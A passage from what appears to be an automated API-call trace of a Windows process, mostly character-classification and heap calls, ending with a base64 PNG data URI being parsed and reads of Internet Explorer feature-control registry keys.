(wch=0x30) returned 0 [0227.697] IsCharSpaceW (wch=0x25) returned 0 [0227.697] IsCharSpaceW (wch=0x25) returned 0 [0227.697] IsCharSpaceW (wch=0x0) returned 0 [0227.697] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2) returned 0x4bc560 [0227.697] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b7a20, Size=0x130) returned 0x4b7a20 [0227.698] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4aad60 | out: hHeap=0x470000) returned 1 [0227.698] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.698] IsCharSpaceW (wch=0xd) returned 1 [0227.698] IsCharSpaceW (wch=0xa) returned 1 [0227.698] IsCharSpaceW (wch=0x9) returned 1 [0227.698] IsCharSpaceW (wch=0x20) returned 1 [0227.698] IsCharSpaceW (wch=0x20) returned 1 [0227.698] IsCharSpaceW (wch=0x69) returned 0 [0227.698] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4aad60 [0227.698] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4aad78 [0227.698] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.698] IsCharSpaceW (wch=0x20) returned 1 [0227.698] IsCharSpaceW (wch=0x7b) returned 0 [0227.698] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4e37a0 [0227.698] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4df900 [0227.698] IsCharSpaceW (wch=0x20) returned 1 [0227.698] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.698] IsCharSpaceW (wch=0xd) returned 1 [0227.698] IsCharSpaceW (wch=0xa) returned 1 [0227.698] IsCharSpaceW (wch=0x9) returned 1 [0227.698] IsCharSpaceW (wch=0x9) returned 1 [0227.698] IsCharSpaceW (wch=0x64) returned 0 [0227.698] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4df900 | out: hHeap=0x470000) returned 1 [0227.698] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.698] IsCharSpaceW (wch=0x3a) returned 0 [0227.698] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c) returned 0x4e7990 [0227.698] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.698] IsCharSpaceW (wch=0x69) returned 0 [0227.698] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.698] IsCharSpaceW (wch=0x3b) returned 0 [0227.698] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.698] IsCharSpaceW (wch=0xd) returned 1 [0227.698] IsCharSpaceW (wch=0xa) returned 1 [0227.698] IsCharSpaceW (wch=0x9) returned 1 [0227.698] IsCharSpaceW (wch=0x20) returned 1 [0227.698] IsCharSpaceW (wch=0x20) returned 1 [0227.698] IsCharSpaceW (wch=0x7d) returned 0 [0227.698] IsCharSpaceW (wch=0x6b) returned 0 [0227.698] IsCharSpaceW (wch=0x69) returned 0 [0227.698] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x4b39c8 [0227.698] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x40) returned 0x4bf810 [0227.699] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.699] IsCharSpaceW (wch=0xd) returned 1 [0227.699] IsCharSpaceW (wch=0xa) returned 1 [0227.699] IsCharSpaceW (wch=0x20) returned 1 [0227.699] IsCharSpaceW (wch=0x20) returned 1 [0227.699] IsCharSpaceW (wch=0x20) returned 1 [0227.699] IsCharSpaceW (wch=0x20) returned 1 [0227.699] IsCharSpaceW (wch=0x20) returned 1 [0227.699] IsCharSpaceW (wch=0x20) returned 1 [0227.699] IsCharSpaceW (wch=0x2e) returned 0 [0227.699] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4aad90 [0227.699] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.699] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4da158 [0227.699] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4df900 [0227.699] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.699] IsCharSpaceW (wch=0x20) returned 1 [0227.699] IsCharSpaceW (wch=0x7b) returned 0 [0227.699] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4bc570 [0227.699] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x16) returned 0x4da178 [0227.699] IsCharSpaceW (wch=0x20) returned 1 [0227.699] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.699] IsCharSpaceW (wch=0xd) returned 1 [0227.699] IsCharSpaceW (wch=0xa) returned 1 [0227.699] IsCharSpaceW (wch=0x20) returned 1 [0227.699] IsCharSpaceW (wch=0x20) returned 1 [0227.699] IsCharSpaceW (wch=0x20) returned 1 [0227.699] IsCharSpaceW (wch=0x20) returned 1 [0227.699] IsCharSpaceW (wch=0x20) returned 1 [0227.699] IsCharSpaceW (wch=0x20) returned 1 [0227.699] IsCharSpaceW (wch=0x20) returned 1 [0227.699] IsCharSpaceW (wch=0x20) returned 1 [0227.699] IsCharSpaceW (wch=0x66) returned 0 [0227.699] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4df900 | out: hHeap=0x470000) returned 1 [0227.699] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.699] IsCharSpaceW (wch=0x3a) returned 0 [0227.699] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c) returned 0x4e79b8 [0227.699] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.699] IsCharSpaceW (wch=0x20) returned 1 [0227.699] IsCharSpaceW (wch=0x62) returned 0 [0227.699] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.699] IsCharSpaceW (wch=0x3b) returned 0 [0227.699] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.699] IsCharSpaceW (wch=0xd) returned 1 [0227.699] IsCharSpaceW (wch=0xa) returned 1 [0227.699] IsCharSpaceW (wch=0x20) returned 1 [0227.699] IsCharSpaceW (wch=0x20) returned 1 [0227.700] IsCharSpaceW (wch=0x20) returned 1 [0227.700] IsCharSpaceW (wch=0x20) returned 1 [0227.700] IsCharSpaceW (wch=0x20) returned 1 [0227.700] IsCharSpaceW (wch=0x20) returned 1 [0227.700] IsCharSpaceW (wch=0x7d) returned 0 [0227.700] IsCharSpaceW (wch=0x64) returned 0 [0227.700] IsCharSpaceW (wch=0x62) returned 0 [0227.700] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x4da198 [0227.700] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x40) returned 0x4bf858 [0227.700] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.700] IsCharSpaceW (wch=0xd) returned 1 [0227.700] IsCharSpaceW (wch=0xa) returned 1 [0227.700] IsCharSpaceW (wch=0x20) returned 1 [0227.700] IsCharSpaceW (wch=0x20) returned 1 [0227.700] IsCharSpaceW (wch=0x20) returned 1 [0227.700] IsCharSpaceW (wch=0x20) returned 1 [0227.700] IsCharSpaceW (wch=0x20) returned 1 [0227.700] IsCharSpaceW (wch=0x20) returned 1 [0227.700] IsCharSpaceW (wch=0x2e) returned 0 [0227.700] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4aada8 [0227.700] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x128) returned 0x4aa498 [0227.700] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4) returned 0x4bc580 [0227.700] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.700] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4da1b8 [0227.700] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4df900 [0227.700] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.700] IsCharSpaceW (wch=0x20) returned 1 [0227.700] IsCharSpaceW (wch=0x7b) returned 0 [0227.700] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x4bc590 [0227.700] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x16) returned 0x4da1d8 [0227.700] IsCharSpaceW (wch=0x20) returned 1 [0227.700] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.700] IsCharSpaceW (wch=0xd) returned 1 [0227.700] IsCharSpaceW (wch=0xa) returned 1 [0227.700] IsCharSpaceW (wch=0x20) returned 1 [0227.700] IsCharSpaceW (wch=0x20) returned 1 [0227.700] IsCharSpaceW (wch=0x20) returned 1 [0227.700] IsCharSpaceW (wch=0x20) returned 1 [0227.700] IsCharSpaceW (wch=0x20) returned 1 [0227.700] IsCharSpaceW (wch=0x20) returned 1 [0227.700] IsCharSpaceW (wch=0x20) returned 1 [0227.700] IsCharSpaceW (wch=0x20) returned 1 [0227.700] IsCharSpaceW (wch=0x62) returned 0 [0227.700] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4df900 | out: hHeap=0x470000) returned 1 [0227.701] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.701] IsCharSpaceW (wch=0x3a) returned 0 [0227.701] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c) returned 0x4e79e0 [0227.701] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.701] IsCharSpaceW (wch=0x20) returned 1 [0227.701] IsCharSpaceW (wch=0x23) returned 0 [0227.701] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.701] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.701] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.701] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.701] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.701] IsCharAlphaNumericW (ch=0x32) returned 1 [0227.701] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.701] IsCharAlphaNumericW (ch=0x35) returned 1 [0227.701] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.701] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.701] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.701] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.701] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4da218 [0227.701] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4df900 [0227.701] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.701] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.701] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.701] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.702] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.702] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.702] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.702] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.702] IsCharAlphaNumericW (ch=0x33) returned 1 [0227.702] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.702] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.702] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.702] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.702] IsCharAlphaNumericW (ch=0x35) returned 1 [0227.702] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.702] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.702] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.702] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.702] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.702] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.702] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.702] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.702] IsCharAlphaNumericW (ch=0x32) returned 1 [0227.702] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.702] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.702] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.703] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.703] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4da278 [0227.703] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4df900 [0227.703] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.703] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.703] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.703] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.703] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.703] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.703] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.703] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.703] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.703] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.703] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.703] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.703] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.703] IsCharAlphaNumericW (ch=0x30) returned 1 [0227.703] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.703] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.703] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.703] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.703] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4da2d8 [0227.703] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4df900 [0227.703] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.704] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.704] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.704] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.704] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.704] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.704] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.704] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.704] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.704] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.704] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.704] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.704] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.704] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.704] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.704] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.704] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.704] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4da258 [0227.704] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4df900 [0227.704] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.704] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.704] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.704] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.705] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.705] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.705] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.705] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.705] IsCharAlphaNumericW (ch=0x30) returned 1 [0227.705] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.705] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.705] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.705] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.705] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.705] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.705] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.727] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.727] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.727] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4da358 [0227.727] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4df900 [0227.727] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.727] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.727] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.727] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.727] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.727] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.728] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.728] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.728] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.728] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.728] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.728] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.728] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.728] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.728] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.728] IsCharAlphaNumericW (ch=0x30) returned 1 [0227.728] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.728] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.728] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.728] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.728] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4da3b8 [0227.728] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4df900 [0227.728] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.728] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.728] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4df900 | out: hHeap=0x470000) returned 1 [0227.728] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4da3d8 [0227.728] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4df900 [0227.728] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.728] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.728] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.728] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.728] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.729] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.729] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.729] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.729] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.729] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.729] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.729] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.729] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.729] IsCharAlphaNumericW (ch=0x33) returned 1 [0227.729] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.729] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.729] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.729] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.729] IsCharAlphaNumericW (ch=0x33) returned 1 [0227.729] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.729] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.729] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.729] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.729] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.729] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.729] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.729] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.730] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.730] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4da438 [0227.730] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4df900 [0227.730] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.730] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.730] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4df900 | out: hHeap=0x470000) returned 1 [0227.730] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4da458 [0227.730] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4df900 [0227.730] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.730] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.730] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.730] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.730] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.730] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.730] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.730] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.730] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.730] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4da498 [0227.730] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4df900 [0227.730] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.730] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.730] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.730] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.730] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.730] IsCharAlphaNumericW (ch=0x30) returned 1 [0227.730] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.731] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.731] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.731] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.731] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4da4f8 [0227.731] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4df900 [0227.731] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.731] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.731] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.731] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.731] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.731] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.731] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.731] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.731] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.731] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.731] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.731] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.731] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.731] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.731] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.731] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.731] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.731] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.731] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.732] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.732] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4da558 [0227.732] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4df900 [0227.732] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.732] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.732] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.732] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.732] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.732] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.732] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.732] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.732] IsCharAlphaNumericW (ch=0x30) returned 1 [0227.732] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.732] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.732] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.732] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.732] IsCharAlphaNumericW (ch=0x30) returned 1 [0227.732] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.732] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.732] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.732] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.732] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.732] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.733] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.747] ParseURLW (in: pcszURL="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII=", ppu=0x41d5a8 | out: ppu=0x41d5a8) returned 0x0 [0227.747] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41d544 | out: phkResult=0x41d544*=0x24c) returned 0x0 [0227.748] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41d548 | out: phkResult=0x41d548*=0x250) returned 0x0 [0227.748] RegOpenKeyExW (in: hKey=0x250, lpSubKey="FEATURE_SCRIPTURL_MITIGATION", ulOptions=0x0, samDesired=0x1, phkResult=0x41d504 | out: phkResult=0x41d504*=0x0) returned 0x2 [0227.748] RegOpenKeyExW (in: hKey=0x24c, lpSubKey="FEATURE_SCRIPTURL_MITIGATION", ulOptions=0x0, samDesired=0x1, phkResult=0x41d504 | out: phkResult=0x41d504*=0x0) returned 0x2 [0227.748] RegCloseKey (hKey=0x0) returned 0x6 [0227.748] RegCloseKey (hKey=0x0) returned 0x6 [0227.748] RegCloseKey (hKey=0x24c) returned 0x0 [0227.748] RegCloseKey (hKey=0x250) returned 0x0 [0227.748] CreateUri (in: 